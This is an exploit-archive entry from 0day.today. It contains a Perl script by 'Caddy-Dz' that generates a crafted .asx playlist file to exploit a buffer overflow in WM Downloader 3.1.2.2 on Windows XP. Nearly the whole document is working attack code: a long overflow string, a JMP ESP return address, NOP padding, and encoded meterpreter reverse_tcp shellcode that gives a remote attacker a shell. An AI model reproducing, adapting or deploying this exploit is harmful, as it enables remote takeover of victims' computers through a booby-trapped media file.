WM Downloader 3.1.2.2(.asx) Buffer Overflow Exploit

2012-04-10T00:00:00
ID 1337DAY-ID-18027
Type zdt
Reporter Caddy-Dz
Modified 2012-04-10T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ####
# Exploit Title: WM Downloader 3.1.2.2(.asx) Buffer Overflow Exploit
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/ALG.Cyber.Army
# E-mail: islam_babia[at]hotmail.com
# Vendor: http://mini-stream.net/downloads/WMDownloader.exe
# Category:: Local Exploits
# Tested on: VMWare Workstation [Windows Xp Sp 2 / French]
####

# Sp Greets : klashincov3 , KedAns-Dz , Kha&Mix , King Of Pirates , The Algerian Cyber Army Team ... All Algerian Hax0rs
#!/usr/bin/perl
my $file = "Caddy.asx";
my $bof = "http://"."\x41" x 17417;
my $ret = "\x7C\xB4\xE7\x52"; # 7CB4E752   FFE4             JMP ESP
my $nop = "\x42" x 12;

my $shellcode =
# meterpreter/reverse_tcp
# x86/shikata_ga_nai succeeded with size 317 (iteration=1)

"\xbe\xf0\x46\x75\x13\xdd\xc3\xd9\x74\x24\xf4\x5f\x33\xc9\xb1".
"\x49\x31\x77\x14\x03\x77\x14\x83\xef\xfc\x12\xb3\x89\xfb\x5b".
"\x3c\x72\xfc\x3b\xb4\x97\xcd\x69\xa2\xdc\x7c\xbd\xa0\xb1\x8c".
"\x36\xe4\x21\x06\x3a\x21\x45\xaf\xf0\x17\x68\x30\x35\x98\x26".
"\xf2\x54\x64\x35\x27\xb6\x55\xf6\x3a\xb7\x92\xeb\xb5\xe5\x4b".
"\x67\x67\x19\xff\x35\xb4\x18\x2f\x32\x84\x62\x4a\x85\x71\xd8".
"\x55\xd6\x2a\x57\x1d\xce\x41\x3f\xbe\xef\x86\x5c\x82\xa6\xa3".
"\x96\x70\x39\x62\xe7\x79\x0b\x4a\xab\x47\xa3\x47\xb2\x80\x04".
"\xb8\xc1\xfa\x76\x45\xd1\x38\x04\x91\x54\xdd\xae\x52\xce\x05".
"\x4e\xb6\x88\xce\x5c\x73\xdf\x89\x40\x82\x0c\xa2\x7d\x0f\xb3".
"\x65\xf4\x4b\x97\xa1\x5c\x0f\xb6\xf0\x38\xfe\xc7\xe3\xe5\x5f".
"\x6d\x6f\x07\x8b\x17\x32\x40\x78\x25\xcd\x90\x16\x3e\xbe\xa2".
"\xb9\x94\x28\x8f\x32\x32\xae\xf0\x68\x82\x20\x0f\x93\xf2\x69".
"\xd4\xc7\xa2\x01\xfd\x67\x29\xd2\x02\xb2\xfd\x82\xac\x6d\xbd".
"\x72\x0d\xde\x55\x99\x82\x01\x45\xa2\x48\x2a\xef\x58\x1b\x95".
"\x47\x33\x5b\x7d\x95\xb4\x5b\x10\x10\x52\x31\xfc\x74\xcc\xae".
"\x65\xdd\x86\x4f\x69\xc8\xe2\x50\xe1\xfe\x13\x1e\x02\x8b\x07".
"\xf7\xe2\xc6\x7a\x5e\xfc\xfd\x11\x5f\x68\xf9\xb3\x08\x04\x03".
"\xe5\x7f\x8b\xfc\xc0\x0b\x02\x68\xab\x63\x6b\x7c\x2b\x74\x3d".
"\x16\x2b\x1c\x99\x42\x78\x39\xe6\x5f\xec\x92\x73\x5f\x45\x46".
"\xd3\x37\x6b\xb1\x13\x98\x94\x94\xa5\xe5\x42\xd1\x23\x1f\xe1".
"\x31\xe8";

open($File,">$file");
print $File $bof.$ret.$nop.$shellcode;
close($File);



#  0day.today [2018-01-04]  #